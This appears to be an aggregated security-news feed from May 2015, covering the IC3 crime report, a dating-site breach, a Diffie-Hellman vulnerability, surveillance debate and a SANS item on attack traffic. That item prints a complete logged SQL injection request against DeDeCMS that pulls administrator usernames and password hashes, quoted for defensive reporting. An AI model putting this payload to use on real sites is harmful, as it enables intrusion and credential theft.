Original release date: May 22, 2015 The Internet Crime Complaint Center (IC3) has released its Internet Crime Report for 2014, indicating that scams relating to social media — including doxing, click-jacking, and pharming — have increased substantially over the past five years. US-CERT encourages users to review the IC3 Alert for details and refer to the US-CERT Tip ST04-014 for information on social engineering and phishing attacks.
Author: Perry Varanoid
The latest one. As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.
Are you too busy provisioning new servers and resetting your users’ Windows passwords to keep up with information security news? If so, we have a quick solution for you. Learn the most important security issues in under ten minutes with our weekly security review video.
If you date online, especially at “adult” dating sites, you may want to reconsider how much data you share with these organizations. This week, a researcher found a stolen user data dump from a very popular adult dating site. Watch the video to learn the details, and find out how to learn whether or not you are affected by this and other breaches.
Typically we try to divide attackers into different groups, all the way from Script Kiddies (no resources, no skills, quite a bit of time/persistence) to more advanced state-sponsored attackers (lots of resources, decent skills and the ability to conduct long-lasting persistent attacks). So it was a bit odd to see an attack against a rather old vulnerability in DeDeCMS. The attack:
GET /uploads/plus/search.php?keyword=11typeArr[%60@%27%60and%28SELECT1%20FROM%28selectcount%28*%29,concat%28floor%28rand%280%29*2%29,%28SELECT/*%27*/concat%280x5f,userid,0x5f,pwd,0x5f%29fromdede_adminLimit0,1%29%29afrominformation_schema.tables%20group%20by%20a%29b%29]=1 HTTP/1.1 301 178 – Python-urllib/2.7
DeDeCMS is a Drupal-like content management system popular in China
A man was arrested for drug dealing based on the IP address he used while querying the USPS package tracking website.
This week, a group of university researchers disclosed a new vulnerability affecting the Diffie-Hellman key exchange. The Diffie-Hellman (DH) key exchange is a cryptographic method for two systems to establish a shared secret over a public communication channel, which they later use to encrypt their communications. Many encryption protocols, including HTTPS, SMTPS, IPSec VPN, SSH, and other TLS implementations, use it to set up shared secrets.
The ACLU’s Chris Soghoian explains (time 25:52-30:55) why the current debate over Section 215 of the Patriot Act is just a minor facet of a large and complex bulk collection program by the FBI and the NSA. There were 180 orders authorized last year by the FISA Court under Section 215 — 180 orders issued by this court. Only five of those orders relate to the telephony metadata program.
Two new high-profile hacks this week collectively exposed millions of users’ data, both more worrying than what has become a run-of-the-mill credit card breach. The reasons for concern, of course, are a bit different.
ISC StormCast for Friday, May 22nd 2015 http://isc.sans.edu/podcastdetail.html?id=4495, (Fri, May 22nd)
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.